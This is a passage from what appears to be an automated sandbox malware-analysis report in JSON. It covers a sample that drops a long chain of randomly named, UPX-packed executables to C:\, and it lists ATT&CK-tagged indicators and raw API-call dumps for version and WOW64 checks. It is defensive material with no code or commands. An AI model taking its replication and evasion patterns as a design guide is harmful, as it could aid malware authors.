"\"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" writes file \"c:\\lpdvdhr.exe\"\n \"lpdvdhr.exe\" writes file \"c:\\nrtffvl.exe\"\n \"nrtffvl.exe\" writes file \"c:\\npltvpp.exe\"\n \"npltvpp.exe\" writes file \"c:\\llxjdlf.exe\"\n \"llxjdlf.exe\" writes file \"c:\\rxrfxtr.exe\"\n \"rxrfxtr.exe\" writes file \"c:\\xhbff.exe\"\n \"xhbff.exe\" writes file \"c:\\vhppv.exe\"\n \"vhppv.exe\" writes file \"c:\\hfbrlh.exe\"\n \"hfbrlh.exe\" writes file \"c:\\brftth.exe\"\n \"brftth.exe\" writes file \"c:\\2644808.exe\"\n \"2644808.exe\" writes file \"c:\\vjvxf.exe\"\n \"vjvxf.exe\" writes file \"c:\\rxbdpdj.exe\"\n \"rxbdpdj.exe\" writes file \"c:\\jdfnf.exe\"\n \"jdfnf.exe\" writes file \"c:\\llpbnv.exe\"\n \"llpbnv.exe\" writes file \"c:\\dtrvhhj.exe\"\n \"dtrvhhj.exe\" writes file \"c:\\lxdlb.exe\"\n \"lxdlb.exe\" writes file \"c:\\fplntnd.exe\"\n \"fplntnd.exe\" writes file \"c:\\xlfdrhv.exe\"\n \"xlfdrhv.exe\" writes file \"c:\\nhjtnrr.exe\"\n \"nhjtnrr.exe\" writes file \"c:\\4868486.exe\"\n \"4868486.exe\" writes file \"c:\\42020.exe\"\n \"42020.exe\" writes file \"c:\\jjjvj.exe\"\n \"jjjvj.exe\" writes file \"c:\\tljxh.exe\"\n \"tljxh.exe\" writes file \"c:\\vnvdx.exe\"\n \"vnvdx.exe\" writes file \"c:\\pxxhpb.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"4644224.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"62424.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"20082.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"xxvjvfv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"rpfxpvf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"66262.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"6820002.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"020066.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"fjjxl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"82488.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"04226.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"240402.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\240402.exe]- [targetUID: 00000000-00004812]\n \"2406002.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2406002.exe]- [targetUID: 00000000-00004812]\n \"drppx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\drppx.exe]- [targetUID: 00000000-00001216]\n \"xtrhlt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xtrhlt.exe]- [targetUID: 00000000-00001216]\n \"pfrdl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pfrdl.exe]- [targetUID: 00000000-00004716]\n \"xfvdbnh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xfvdbnh.exe]- [targetUID: 00000000-00004716]\n \"blvvjn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\blvvjn.exe]- [targetUID: 00000000-00001424]\n \"fvbpf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fvbpf.exe]- [targetUID: 00000000-00001424]\n \"ntpjj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ntpjj.exe]- [targetUID: 00000000-00000776]\n \"644880.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\644880.exe]- [targetUID: 00000000-00000776]\n \"824246.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\824246.exe]- [targetUID: 00000000-00002704]\n \"02486.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\02486.exe]- [targetUID: 00000000-00002792]\n \"66842.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\66842.exe]- [targetUID: 00000000-00001632]\n \"2484466.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2484466.exe]- [targetUID: 00000000-00001632]\n \"0806084.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0806084.exe]- [targetUID: 00000000-00003324]\n \"84800.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\84800.exe]- [targetUID: 00000000-00004400]\n \"dfddlr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dfddlr.exe]- [targetUID: 00000000-00004612]\n \"llxxlrt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\llxxlrt.exe]- [targetUID: 00000000-00004612]\n \"jtpjhr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jtpjhr.exe]- [targetUID: 00000000-00003404]\n \"vpvxpp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vpvxpp.exe]- [targetUID: 00000000-00003404]\n \"ltjhnht.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ltjhnht.exe]- [targetUID: 00000000-00003776]\n \"fvxvdn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fvxvdn.exe]- [targetUID: 00000000-00003776]\n \"thdhnfb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\thdhnfb.exe]- [targetUID: 00000000-00001084]\n \"xbrvntf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xbrvntf.exe]- [targetUID: 00000000-00003352]\n \"jntndr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jntndr.exe]- [targetUID: 00000000-00003352]\n \"jvxvd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jvxvd.exe]- [targetUID: 00000000-00004148]\n \"pbpbdlp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pbpbdlp.exe]- [targetUID: 00000000-00003668]\n \"bprdtlh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\bprdtlh.exe]- [targetUID: 00000000-00003668]\n \"40664.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\40664.exe]- [targetUID: 00000000-00000796]\n \"4444446.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4444446.exe]- [targetUID: 00000000-00004604]\n \"28408.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\28408.exe]- [targetUID: 00000000-00004604]\n \"620220.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\620220.exe]- [targetUID: 00000000-00004368]\n \"206666.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\206666.exe]- [targetUID: 00000000-00003456]\n \"nhppdj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nhppdj.exe]- [targetUID: 00000000-00003456]\n \"80426.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\80426.exe]- [targetUID: 00000000-00004004]\n \"6680468.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6680468.exe]- [targetUID: 00000000-00004004]\n \"4448240.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4448240.exe]- [targetUID: 00000000-00001436]\n \"4828644.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4828644.exe]- [targetUID: 00000000-00001436]\n \"06204.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\06204.exe]- [targetUID: 00000000-00000864]\n \"pxxhpb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pxxhpb.exe]- [targetUID: 00000000-00000864]\n \"vnvdx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vnvdx.exe]- [targetUID: 00000000-00001856]\n \"tljxh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tljxh.exe]- [targetUID: 00000000-00003712]\n \"jjjvj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jjjvj.exe]- [targetUID: 00000000-00003712]\n \"42020.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\42020.exe]- [targetUID: 00000000-00003920]\n \"4868486.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4868486.exe]- [targetUID: 00000000-00003728]\n \"nhjtnrr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nhjtnrr.exe]- [targetUID: 00000000-00003728]\n \"xlfdrhv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xlfdrhv.exe]- [targetUID: 00000000-00001284]\n \"fplntnd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fplntnd.exe]- [targetUID: 00000000-00001284]\n \"lxdlb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lxdlb.exe]- [targetUID: 00000000-00001876]\n \"dtrvhhj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dtrvhhj.exe]- [targetUID: 00000000-00001876]\n \"llpbnv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\llpbnv.exe]- [targetUID: 00000000-00003248]\n \"jdfnf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jdfnf.exe]- [targetUID: 00000000-00003248]\n \"rxbdpdj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rxbdpdj.exe]- [targetUID: 00000000-00002708]\n \"vjvxf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vjvxf.exe]- [targetUID: 00000000-00002708]\n \"2644808.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2644808.exe]- [targetUID: 00000000-00004556]\n \"brftth.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\brftth.exe]- [targetUID: 00000000-00003468]\n \"hfbrlh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hfbrlh.exe]- [targetUID: 00000000-00003468]\n \"vhppv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vhppv.exe]- [targetUID: 00000000-00003612]\n \"xhbff.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xhbff.exe]- [targetUID: 00000000-00003228]\n \"rxrfxtr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rxrfxtr.exe]- [targetUID: 00000000-00003448]\n \"llxjdlf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\llxjdlf.exe]- [targetUID: 00000000-00003448]\n \"npltvpp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\npltvpp.exe]- [targetUID: 00000000-00002192]\n \"nrtffvl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nrtffvl.exe]- [targetUID: 00000000-00004544]\n \"lpdvdhr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lpdvdhr.exe]- [targetUID: 00000000-00004544]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "static-5", "relevance": 10, "name": "PE file contains zero-size sections", "description": "Raw size of \"UPX0\" is zero", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002c00d87a2c00d37a2c00000000000000000000002400000000011ce312000000000080f0120095e1537785ea4500feffffff435c577750595777aa000000b8000000d27a2c00d07a2c00a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5c567760d87075ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed5777fa7a2c00a06a2d7586000000a4e41200dce812000000000086008800a06a2d75a4e41200916c2d75fa7a2c00a06a2d75a06a2d7514e9120002020000 (UID: 00000000-00004044)\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004044)\n \"lpdvdhr.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004544)\n \"lpdvdhr.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000370060e737005be73700000000000000000000003000000000011ce312000000000080f0120095e15377bde94500feffffff435c577750595777aa000000b80000005ae7370058e73700a4e41200dce81200000000000000000000000000000000000000000000000000a01a0000000030001c5c567760d87075ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed577782e73700a06a2d7586000000a4e41200dce812000000000086008800a06a2d75a4e41200916c2d7582e73700a06a2d75a06a2d7514e9120002020000 (UID: 00000000-00004544)\n \"lpdvdhr.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004544)\n \"nrtffvl.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005960)\n \"nrtffvl.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002f00386e2f00336e2f0000000000000000000000270000000001ecdf12000000000050ed120095e1537727ee4500feffffff435c577750595777aa000000b8000000326e2f00306e2f0074e11200ace51200000000000000000000000000000000000000000000000000a01a0000000027001c5c567760d87075ffffffff1700000024e11200240000000300000014e6120040eb1200ace512008600000050e1120096ed57775a6e2f00a06a2d758600000074e11200ace512000000000086008800a06a2d7574e11200916c2d755a6e2f00a06a2d75a06a2d75e4e5120002020000 (UID: 00000000-00005960)\n \"nrtffvl.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005960)\n \"npltvpp.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002f00a05c2f009b5c2f00000000000000000000002700000000011ce312000000000080f0120095e15377d8134500feffffff435c577750595777aa000000b80000009a5c2f00985c2f00a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5c567760d87075ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed5777c25c2f00a06a2d7586000000a4e41200dce812000000000086008800a06a2d75a4e41200916c2d75c25c2f00a06a2d75a06a2d7514e9120002020000 (UID: 00000000-00002192)\n \"npltvpp.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002192)\n \"llxjdlf.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003448)\n \"llxjdlf.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002d00085c2d00035c2d00000000000000000000002500000000011ce312000000000080f0120095e15377d2124500feffffff435c577750595777aa000000b8000000025c2d00005c2d00a4e41200dce81200000000000000000000000000000000000000000000000000a01a0000000025001c5c567760d87075ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed57772a5c2d00a06a2d7586000000a4e41200dce812000000000086008800a06a2d75a4e41200916c2d752a5c2d00a06a2d75a06a2d7514e9120002020000 (UID: 00000000-00003448)\n \"llxjdlf.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003448)\n \"rxrfxtr.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002000f85c2000f35c2000000000000000000000001800000000011ce312000000000080f0120095e1537784104500feffffff435c577750595777aa000000b8000000f25c2000f05c2000a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5c567760d87075ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed57771a5d2000a06a2d7586000000a4e41200dce812000000000086008800a06a2d75a4e41200916c2d751a5d2000a06a2d75a06a2d7514e9120002020000 (UID: 00000000-00003228)\n \"rxrfxtr.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003228)\n \"xhbff.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003612)\n \"xhbff.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002a00b8df2a00b3df2a0000000000000000000000280000000001ecdf12000000000050ed120095e153770a174500feffffff435c577750595777aa000000b8000000b2df2a00b0df2a0074e11200ace5120000000000000000000000000000000000000000000000000000000000000000001c5c567760d87075ffffffff1700000024e11200240000000300000014e6120040eb1200ace512008600000050e1120096ed5777dadf2a00a06a2d758600000074e11200ace512000000000086008800a06a2d7574e11200916c2d75dadf2a00a06a2d75a06a2d75e4e5120002020000 (UID: 00000000-00003612)\n \"xhbff.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003612)\n \"vhppv.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000006900405d69003b5d6900000000000000000000006100000000011ce312000000000080f0120095e15377ab1a4500feffffff435c577750595777aa000000b80000003a5d6900385d6900a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5c567760d87075ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed5777625d6900a06a2d7586000000a4e41200dce812000000000086008800a06a2d75a4e41200916c2d75625d6900a06a2d75a06a2d7514e9120002020000 (UID: 00000000-00003168)\n \"vhppv.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003168)\n \"hfbrlh.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000006a00685d6a00635d6a00000000000000000000006200000000011ce312000000000080f0120095e1537795194500feffffff435c577750595777aa000000b8000000625d6a00605d6a00a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5c567760d87075ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed57778a5d6a00a06a2d7586000000a4e41200dce812000000000086008800a06a2d75a4e41200916c2d758a5d6a00a06a2d75a06a2d7514e9120002020000 (UID: 00000000-00003468)\n \"hfbrlh.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003468)\n \"brftth.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003860)\n \"brftth.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000006a00d8556a00d3556a00000000000000000000006200000000011ce312000000000080f0120095e153772a034500feffffff435c577750595777aa000000b8000000d2556a00d0556a00a4e41200dce81200000000000000000000000000000000000000000000000000c01a0000000062001c5c567760d87075ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed5777fa556a00a06a2d7586000000a4e41200dce812000000000086008800a06a2d75a4e41200916c2d75fa556a00a06a2d75a06a2d7514e9120002020000 (UID: 00000000-00003860)\n \"brftth.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003860)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"lpdvdhr.exe\" called \"IsWow64Process\" with parameter \"4544\" - (UID: 00000000-00004544)\n \"nrtffvl.exe\" called \"IsWow64Process\" with parameter \"5960\" - (UID: 00000000-00005960)\n \"llxjdlf.exe\" called \"IsWow64Process\" with parameter \"3448\" - (UID: 00000000-00003448)\n \"xhbff.exe\" called \"IsWow64Process\" with parameter \"3612\" - (UID: 00000000-00003612)\n \"brftth.exe\" called \"IsWow64Process\" with parameter \"3860\" - (UID: 00000000-00003860)\n \"2644808.exe\" called \"IsWow64Process\" with parameter \"4556\" - (UID: 00000000-00004556)\n \"rxbdpdj.exe\" called \"IsWow64Process\" with parameter \"1132\" - (UID: 00000000-00001132)\n 